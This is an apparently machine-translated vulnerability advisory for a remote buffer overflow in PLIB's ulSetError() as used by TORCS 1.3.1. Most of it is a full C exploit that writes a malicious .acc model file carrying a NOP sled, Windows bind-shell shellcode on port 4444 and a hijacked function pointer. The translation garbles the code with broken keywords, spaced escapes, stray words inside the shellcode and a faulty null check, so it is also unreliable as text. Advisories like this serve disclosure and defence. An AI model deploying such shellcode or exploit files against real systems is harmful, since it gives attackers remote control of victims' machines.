PLIB "ulSetError ()" function Remote Buffer Overflow Vulnerability

Release date: 2011-12-21
Updated on: 2011-12-22

Affected Systems:
PLIB 1.8.5
TORCS 1.3.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51152

PLIB is a portable game library.

PLIB has a remote buffer overflow vulnerability in the implementation of the ulSetError () function (src/util/ulError. cxx). Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: Android & Atilde; & copy; s G & Atilde; & sup3; mez

Link: http://secunia.com/advisories/47297/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Android & Atilde; & copy; s G & Atilde; & sup3; mez () provides the following test methods:

Http://downloads.securityfocus.com/vulnerabilities/exploits/51152.c

/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE :*/

/*
This exploit generates a specified upted acc file
Which has to be saved in the directories where
TORCS loads its data, for example replace
Cars/car4-trb1/car4-trb1.acc and put test. acc or create
A new car/track and select it in the TORCS menu
*/

# Include <stdio. h>
# Include <stdlib. h>

/*
Shellcode: windows/shell_bind_tcp LPORT = 4444-B '\ x00 \ xff \ x0a'
Encoder: x86/shikata_ga_nai
*/

Unsigned char buf [] =
"\ Xbd \ x2e \ xed \ xb6 \ x2d \ xdd \ xc2 \ xd9 \ x74 \ x24 \ xf4 \ x5e \ x2b \ xc9 \ xb1"
"\ X56 \ x83 \ xee \ xfc \ x31 \ x6e \ x0f \ x03 \ x6e \ x21 \ x0f \ x43 \ xd1 \ xd5 \ x46"
"\ Xac \ x2a \ x25 \ x39 \ x24 \ xcf \ x14 \ x6b \ x52 \ x9b \ x04 \ xbb \ x10 \ xc9 \ xa4"
"\ X30 \ x74 \ xfa \ x3f \ x34 \ x51 \ x0d \ x88 \ xf3 \ x87 \ x20 \ x09 \ x32 \ x08 \ xee"
"\ Xc9 \ x54 \ xf4 \ xed \ x1d \ xb7 \ xc5 \ x3d \ x50 \ xb6 \ x02 \ x23 \ x9a \ xea \ xdb"
"\ X2f \ x08 \ x1b \ x6f \ x6d \ x90 \ x1a \ xbf \ xf9 \ xa8 \ x64 \ xba \ x3e \ x5c \ xdf"
"\ Xc5 \ x6e \ xcc \ x54 \ x8d \ x96 \ x67 \ x32 \ x2e \ xa6 \ xa4 \ x20 \ x12 \ xe1 \ xc1"
"\ X93 \ xe0 \ xf0 \ x03 \ xea \ x09 \ xc3 \ x6b \ xa1 \ x37 \ xeb \ x66 \ xbb \ cross city \ xcc"
"\ X98 \ xce \ x8a \ x2e \ x25 \ xc9 \ x48 \ x4c \ xf1 \ x5c \ x4d \ xf6 \ x72 \ xc6 \ xb5"
"\ X06 \ x57 \ x91 \ x3e \ x04 \ x1c \ xd5 \ x19 \ x09 \ xa3 \ x3a \ x12 \ x35 \ x28 \ xbd"
"\ Xf5 \ xbf \ x6a \ x9a \ xd1 \ xe4 \ x29 \ x83 \ x40 \ x41 \ x9c \ xbc \ x93 \ x2d \ x41"
"\ X19 \ xdf \ xdc \ x96 \ x1b \ x82 \ x88 \ x5b \ x16 \ x3d \ x49 \ xf3 \ x21 \ x4e \ x7b"
"\ X5c \ x9a \ xd8 \ x37 \ x15 \ x04 \ x1e \ x37 \ x0c \ xf0 \ xb0 \ xc6 \ xae \ x01 \ x98"
"\ X0c \ xfa \ x51 \ xb2 \ xa5 \ x82 \ x39 \ x42 \ x49 \ x57 \ xed \ x12 \ xe5 \ x07 \ x4e"
"\ Xc3 \ x45 \ xf7 \ x26 \ x09 \ x4a \ x28 \ x56 \ x32 \ x80 \ x5f \ x50 \ xfc \ xf0 \ x0c"
"\ X37 \ xfd \ x06 \ xa3 \ x9b \ x88 \ xe1 \ xa9 \ x33 \ xdd \ xba \ x45 \ xf6 \ x3a \ x73"
"\ Xf2 \ x09 \ x69 \ x2f \ xab \ x9d \ x25 \ x39 \ x6b \ xa1 \ xb5 \ x6f \ xd8 \ x0e \ x1d"
"\ Xf8 \ xaa \ x5c \ x9a \ x19 \ xad \ x48 \ x8a \ x50 \ x96 \ x1b \ x40 \ x0d \ x55 \ xbd"
"\ X55 \ x04 \ x0d \ x5e \ xc7 \ xc3 \ xcd \ x29 \ xf4 \ x5b \ x9a \ x7e \ xca \ x95 \ x4e"
"\ X93 \ x75 \ x0c \ x6c \ x6e \ xe3 \ x77 \ x34 \ xb5 \ xd0 \ x76 \ xb5 \ x38 \ x6c \ x5d"
"\ Xa5 \ x84 \ x6d \ xd9 \ x91 \ x58 \ x38 \ xb7 \ x4f \ x1f \ x92 \ x79 \ x39 \ xc9 \ x49"
"\ Xd0 \ xad \ x8c \ xa1 \ xe3 \ xab \ x90 \ xef \ x95 \ x53 \ x20 \ x46 \ xe0 \ x6c \ x8d"
"\ X0e \ xe4 \ x15 \ xf3 \ xae \ x0b \ xcc \ xb7 \ xdf \ x41 \ x4c \ x91 \ x77 \ x0c \ x05"
"\ Xa3 \ x15 \ xaf \ xf0 \ xe0 \ x23 \ x2c \ xf0 \ x98 \ xd7 \ x2c \ x71 \ x9c \ x9c \ xea"
"\ X6a \ xec \ x8d \ x9e \ x8c \ x43 \ xad \ x8a ";

// This points to your shellcode
Unsigned char function_pointer [] = "\ xA8 \ xCA \ x0E \ x10 ";

Int main (int argc, char ** argv ){

FILE * save_fd;
Int I = 0;

Save_fd = fopen ("test. acc", "w ");

If (save_fd = NULL ){
Printf ("Failed to open '% s' for writing", "test. acc ");
Return-1;
}

Fprintf (save_fd, "AC3Db \ n ");
Fprintf (save_fd, "MATERIAL \"");
For (I = 0; I <607; I ++ ){
Putc ('\ x90', save_fd );
}
Fprintf (save_fd, "% s \" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0 \ n ", buf, function_pointer );
Fprintf (save_fd, "OBJECT world \ n ");
Fprintf (save_fd, "kids % d \ n", 5 );

Close (save_fd );

Return 0;
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PLIB
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://plib.sourceforge.net/